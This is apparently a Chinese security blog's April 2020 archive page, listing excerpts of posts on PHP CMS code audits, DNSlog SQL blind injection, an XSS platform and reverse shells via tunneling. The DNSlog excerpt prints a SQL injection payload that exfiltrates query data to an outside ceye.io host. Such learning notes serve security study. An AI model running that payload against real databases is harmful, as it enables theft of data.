04 2020 档案

[php代码审计]熊海cms v1.0
摘要:一、环境搭建 熊海cms v1.0源码 windows 7 phpstudy2016(php 5.4.45) seay源代码审计系统 注意搭建环境时将路径中的中文改成英文 二、漏洞列表 seay 报出 34 个可能的漏洞,不是很多可以再结合容易出漏洞的功能点逐一看一下 2.1文件包含 先检查第一个可 阅读全文
posted @ 2020-04-30 21:51 beiwo 阅读(1424) 评论(0) 推荐(0)
[php代码审计]bluecms v1.6 sp1
摘要:一、环境搭建 bluecms v1.6 sp1源码 windows 7 phpstudy2016(php 5.4.45) seay源代码审计系统 源码在网上很容易下载,很多教程说访问地址 http://localhost/bluecms_v1.6_sp1/uploads/install/ 就会进入到 阅读全文
posted @ 2020-04-23 21:24 beiwo 阅读(4837) 评论(0) 推荐(0)
php代码审计基础
摘要:挺久前看了半本代码审计,但是现在翻来都忘得差不多了。因为最近想开始一些cms的代码审计实战,就过了一遍安全牛的php代码审计视频,下面是笔记啦 一、思路和流程 通读原文:公共函数文件、安全过滤文件、配置文件、index文件 敏感关键字回溯参数 查找可控变量 功能点定向审计:程序安装、文件上传、文件管 阅读全文
posted @ 2020-04-19 15:24 beiwo 阅读(476) 评论(0) 推荐(0)
利用dnslog进行sql盲注
摘要:一、原理 攻击者向 mysql 数据库提交注入语句 ?id=1' and if((select load_file(concat('\\\\',(攻击代码),'.xxxxxx.ceye.io\\abc'))),1,0)--+ if(x,1,0) 如果x为真,则输出1,假则输出0 load_file( 阅读全文
posted @ 2020-04-12 10:19 beiwo 阅读(1118) 评论(0) 推荐(0)
搭建个人xss平台
摘要:想记录一下是因为这个原版的安装配置是 nginx 搭建在 linux 服务器上,而我更习惯用 apache 搭建在物理机上。所以先在网上浏览了一下其他 xss 平台的搭建过程,自己总结、摸索之后成功搭建:) 环境是 win10,phpstudy,xss平台搭在物理机上,通过内网穿透从外网访问。xss 阅读全文
posted @ 2020-04-08 22:09 beiwo 阅读(7266) 评论(0) 推荐(0)
python3.7项目打包为一个exe
摘要:范同学昨晚发了我一个桌面宠物,是每次随机生成的,也有源码,自己改成了固定生成皮卡丘的,在重新编译 py 文件的时候遇到很多问题,记录一下(什么都比写作业好玩嘻嘻嘻) 1.安装 pyinstaller,在 https://github.com/pyinstaller/pyinstaller 下载dev 阅读全文
posted @ 2020-04-07 13:16 beiwo 阅读(958) 评论(0) 推荐(0)
通过内网穿透反弹shell
摘要:ngrok 的使用方法在我这篇博客的3.3小节记录过 https://www.cnblogs.com/wkzb/p/12358076.html#autoid-3-2-0 这篇文章的使用情景是攻击机在内网中,而靶机有公网ip(换句话说就是 kali 可以 ping 通靶机,靶机无法 ping 通 ka 阅读全文
posted @ 2020-04-04 15:35 beiwo 阅读(845) 评论(0) 推荐(0)